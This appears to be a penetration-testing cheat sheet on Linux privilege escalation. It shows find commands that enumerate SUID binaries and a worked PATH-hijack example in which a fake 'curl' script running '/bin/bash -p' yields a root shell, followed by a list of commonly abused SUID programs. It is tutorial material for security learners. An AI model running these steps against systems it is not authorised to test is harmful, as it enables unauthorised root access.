Path Variable Manipulation
What is SUID, SGID, and Sticky bits?


Search system for types of files with SUID bits
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Verify file has SUID bit
ls -l /usr/file/test
# Example Output:
# -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/file/test
Example of exploit
We find a script that has SUID bit, which runs curl upon call. Create a binary called curl that gives you a bash shell, then modify the user's PATH to use your created curl which running the script will give you a root bash shell.
# Verify file has SUID bit
ls -l /usr/bin/script
# Output:
# -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/script
# Create binary called curl
echo "/bin/bash -p" > /home/user/curl
chmod +x /home/user/curl
#Modify $PATH
echo $PATH
export PATH=/home/user:$PATH
echo $PATH
# Running exploit
/usr/bin/script
What are typical SUID files? (not cp)

Research against https://gtfobins.github.io/ to find a vulnerable service. You could also use LinEnum or LinPeas to automate Piv Esc.
Common SUID to Priv Esc:
Nmap
Vim
find
Bash
More
Less
Nano
cp
Last updated
Was this helpful?